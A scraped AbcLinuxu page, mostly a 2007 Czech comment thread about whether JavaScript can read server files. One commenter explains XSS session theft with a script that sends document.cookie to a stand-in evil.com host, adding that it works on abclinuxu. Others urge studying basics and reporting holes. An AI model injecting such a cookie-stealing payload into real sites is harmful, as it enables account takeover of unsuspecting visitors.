.

Přihlášení | Registrace

napište » Zprávičky

dnes 17:33 | Komunita

MDN (Wikipedie), dnes MDN Web Docs, původně Mozilla Developer Network, slaví 20 let. V říjnu 2004 byl ukončen provoz serveru Netscape DevEdge, který byl hlavním zdrojem dokumentace k webovým prohlížečům Netscape a k webovým technologiím obecně. Mozille se po jednáních s AOL povedlo dokumenty z Netscape DevEdge zachránit a 23. července 2005 byl spuštěn MDC (Mozilla Developer Center). Ten byl v roce 2010 přejmenován na MDN.

Ladislav Hagara | Komentářů: 0

Wayback 0.1

dnes 14:55 | Nová verze

Wayback byl vydán ve verzi 0.1. Wayback je "tak akorát Waylandu, aby fungoval Xwayland". Jedná se o kompatibilní vrstvu umožňující běh plnohodnotných X11 desktopových prostředí s využitím komponent z Waylandu. Cílem je nakonec nahradit klasický server X.Org, a tím snížit zátěž údržby aplikací X11.

Ladislav Hagara | Komentářů: 0

Tails 6.18

dnes 13:33 | Nová verze

Byla vydána nová verze 6.18 živé linuxové distribuce Tails (The Amnesic Incognito Live System), jež klade důraz na ochranu soukromí uživatelů a anonymitu. Nově se lze k síti Tor připojit pomocí mostu WebTunnel. Tor Browser byl povýšen na verzi 14.5.5. Thunderbird na verzi 128.12.0. Další změny v příslušném seznamu.

Ladislav Hagara | Komentářů: 0

Náramek pro ovládaní počítače využívající povrchovou elektromyografii

včera 14:33 | IT novinky

Meta představila prototyp náramku, který snímá elektrickou aktivity svalů (povrchová elektromyografie, EMG) a umožňuje jemnými gesty ruky a prstů ovládat počítač nebo různá zařízení. Získané datové sady emg2qwerty a emg2pose jsou open source.

Ladislav Hagara | Komentářů: 0

OPNsense 25.7 Visionary Viper

včera 14:22 | Nová verze

Byla vydána (𝕏) nová verze 25.7 open source firewallové a routovací platformy OPNsense (Wikipedie). Jedná se o fork pfSense postavený na FreeBSD. Kódový název OPNsense 25.7 je Visionary Viper. Přehled novinek v příspěvku na fóru.

Ladislav Hagara | Komentářů: 0

Před 40 lety byla představena první Amiga

včera 13:33 | IT novinky

Před 40 lety, 23. července 1985, společnost Commodore představila první počítač Amiga. Jednalo se o počítač "Amiga od Commodore", jenž byl později pojmenován Amiga 1000. Mělo se jednat o přímou konkurenci počítače Apple Macintosh uvedeného na trh v lednu 1984.

Ladislav Hagara | Komentářů: 2

T‑Mobile USA spustil službu T-Satellit

včera 06:00 | IT novinky

T‑Mobile USA ve spolupráci se Starlinkem spustil službu T-Satellite. Uživatelé služby mohou v odlehlých oblastech bez mobilního signálu aktuálně využívat satelitní síť s více než 650 satelity pro posílání a příjem zpráv, sdílení polohy, posílání zpráv na 911 a příjem upozornění, posílání obrázků a krátkých hlasových zpráv pomocí aplikace Zprávy Google. V plánu jsou také satelitní data.

Ladislav Hagara | Komentářů: 9

Proxmox věnoval 10 000 eur nadaci Perl a Raku

23.7. 21:55 | Komunita

Společnost Proxmox Server Solutions stojící za virtualizační platformou Proxmox Virtual Environment věnovala 10 000 eur nadaci The Perl and Raku Foundation (TPRF).

Ladislav Hagara | Komentářů: 2

Apache HTTP Server (httpd) 2.4.65 řeší bezpečnostní chybu CVE-2025-54090

23.7. 21:22 | Bezpečnostní upozornění

Byla vydána nová verze 2.4.65 svobodného multiplatformního webového serveru Apache (httpd). Řešena je bezpečnostní chyba CVE-2025-54090.

Ladislav Hagara | Komentářů: 0

Proton Lumo

23.7. 14:22 | IT novinky

Společnost Proton AG stojící za Proton Mailem a dalšími službami přidala do svého portfolia AI asistenta Lumo.

Ladislav Hagara | Komentářů: 7

Centrum | Napsat | Starší

navrhněte » Anketa

Kolik tabů máte standardně otevřeno ve web prohlížeči?

1-4 (28%)

5-15 (25%)

16-30 (6%)

31-50 (5%)

51-70 (5%)

71-100 (2%)

101-130 (2%)

>131 (29%)

Celkem 126 hlasů

Komentářů: 16, poslední dnes 15:31

Rozcestník

AbcLinuxu

HDmag.cz

unknown_ - blog

Aktuální zápisy

? Archív

? Současný desktop

Openbox 3.4.4, Onyx-citrus + FreeBSD 8-CURRENT

? Navigace

Nej blogů na AbcLinuxu

Nejčtenější za poslední měsíc

Nejkomentovanější za poslední měsíc

AbcLinuxu:/ Blogy / blog / asdgf / .

Štítky: není přiřazen žádný štítek

.

28.12.2007 01:18 | asdgf | poslední úprava: 26.11.2009 20:42

Hodnocení: 14 %

špatné • dobré

Tiskni Sdílej:

Komentáře

Nástroje: Začni sledovat (1) ? , Tisk

Vložit další komentář

28.12.2007 01:40 progdan | skóre: 34 | blog: Archař | Teplice/Brno
Rozbalit Rozbalit vše Re: Javascript + přístup k souborům

Odpovědět | Sbalit | Link | Blokovat | Admin

Nejsem si zcela jisty, ale k souborum myslim JavaScript do urcite miry pristupovat dokaze. Cim sem si vsak jisty, nedokaze pristoupit k souboru php. Tedy dokaze, ale ziska pouze koncovy (X)HTML (nebo jiny) vystup, nikdy vsak samotny kod souboru - to nelze zadnym zpusobem ani jazykem (krome prolomeni hesla na FTP a stazeni souboru ale to uz je neco trochu jinyho)

Collecting data is only the first step toward wisdom, but sharing data is the first step toward the community.

28.12.2007 01:43 unknown_ | skóre: 30 | blog: blog
Rozbalit Rozbalit vše Re: Javascript + přístup k souborům

Dík, myslel sem, že pokud k tomu dokáže přistoupit, tak jako k plain textu, protože html výstup už mám :-)

28.12.2007 01:45 unknown_ | skóre: 30 | blog: blog
Rozbalit Rozbalit vše Re: Javascript + přístup k souborům

K tomu přístupu k .php, mělo by to jít pomocí php funkce readfile()?

28.12.2007 01:54 Josef Kufner | skóre: 70
Rozbalit Rozbalit vše Re: Javascript + přístup k souborům

Odpovědět | Sbalit | Link | Blokovat | Admin

K souborům by jsi se neměl dostat ani na straně klienta a už vůbec ne na straně serveru. Pokud se ti to povede, tak to nahlaš jako obrovskou bezpečnostní díru.

Hello world ! Segmentation fault (core dumped)

28.12.2007 01:59 unknown_ | skóre: 30 | blog: blog
Rozbalit Rozbalit vše Re: Javascript + přístup k souborům

To se mi nepovede už proto, že se tím asi dál zabývat nebudu, jen sem se trochu nudil, takže je mi to docela jedno. Jenom škoda, mohl z toho být poprask. Ale na to XSS je náchylnej snad každej druhej server :-/

28.12.2007 01:59 Přemek Vyhnal | skóre: 24 | blog: Toto není blog! | Dobřichovice
Rozbalit Rozbalit vše Re: Javascript + přístup k souborům

Odpovědět | Sbalit | Link | Blokovat | Admin

Můžu pomocí javascriptu zobrazit index.php?

Javascript běží u klienta - v prohlížeči.

Ale kdyz ho dokazes vlozit do nejaky stranky tak aby se zobrazil i jinym navstevnikum tak muzes napriklad ukrast prihlasovaci susenku.

<script>
location.href="http://evil.com/sendtomail.php?cookie="+document.cookie; 
</script>

Tohle presmeruje navstevnika na utocnikuv server na script kterej parametry co dostane pres GET posle na mail (treba). Utocnik si pak to co mu prijde nastavi jako svoji susenku a rychle nez se obet odhlasi se pujde s tou susenkou podivat na ten web a bude prihlasenej jako uzivatel kterymu to ukrad.

..ale je to lamarna .)

BTW jde to i na abclinuxu

NO RAPTORS!

28.12.2007 10:37 Ritchie | skóre: 27 | blog: Ritchie's | Berlin
Rozbalit Rozbalit vše Re: Javascript + přístup k souborům

Odpovědět | Sbalit | Link | Blokovat | Admin

Samozřejmě, že lze pomocí javascriptu otevřít soubor, stačí vytvořit objekt File. Ovšem ne všechny implementace javascriptu povolují vytvořit takový objekt, například implementace javascriptu v prohlížečích z pochopitelných důvodů soubory otevírat neumožňují.

Nemusím snad psát, že abyste mohl otevřít soubor, musíte mít přístup k souborovému systému, kde se soubor nachází. Pokud máte představu, že HTTP zpřístupňuje souborový systém serveru, doporučuji si přečíst alespoň úvod k tomuto protokolu. Zabralo by vám to jistě méně času, než napsání nesmyslného příspěvku do blogu.

28.12.2007 11:51 Filip Jirsák | skóre: 68 | blog: Fa & Bi
Rozbalit Rozbalit vše Re: Javascript + přístup k souborům

Odpovědět | Sbalit | Link | Blokovat | Admin

Btw neznáte nějaký přehled javascriptových funkcí? Nerad bych swe zdržoval věcma jako že a=1, b=2, a+b=3; to je ve všech jazycích stejný. Potřeboval bych nějaký přehled všech funkcí javascriptu. Nevíte o něčem takovým? … Co udělat na webu, hacknutelného přes XSS, když nemůžu nahradit index?

Nechat ten hacknutelný web na pokoji, a jít studovat základy. Základy programování, základy HTML a souvisejících věcí, co je to JavaScript a co jsou různé jeho implementace. Pak taky můžete trénovat vyhledávání Googlem (to abyste se nemusel shánět po manuálech k JavaScriptu, když vám jich Google najde několik stránek). Až to všechno budete mít nastudované, zjistěte si taky, co je to XSS – doufám, že po prostudování všeho předešlého už nebudete zklamaný z toho, že XSS není to, co hledáte.

28.12.2007 22:34 Mazarik
Rozbalit Rozbalit vše Re: Javascript + přístup k souborům

Odpovědět | Sbalit | Link | Blokovat | Admin

Pokial Javascript chcete pouzit ako jazyk na serveri(nieco v style php), tak sa samozrejme subory otvarat daju. Pokial chcete pracovat so subormi na html stranke na strane klienta, tak to ide imho maximalne pomocou html input type="file" tusim, kde sa Vam otvori file dialog. Na ine operacie so subormi na strane klienta potrebujete vacsie prava, ktore musi povolit uzivatel. Aj ked som presne nepochopil o co Vam vlastne ide, tak pravdepodobne chcete presmerovat stranku pomocou javascriptu na inu stranku. Tak to sa robi napriklad document.location.href="_adresa_"

28.12.2007 22:36 Mazarik
Rozbalit Rozbalit vše Re: Javascript + přístup k souborům

Este celkom dobra a dokumentacia Javascriptu, ktora funguje vo vsetkych prehliadacoch, je na stranke http://devguru.com/technologies/javascript/home.asp

Založit nové vlákno • Nahoru

Píšeme jinde

ISSN 1214-1267 www.czech-server.cz

Redakce | Inzerce | Podmínky použití | Osobní údaje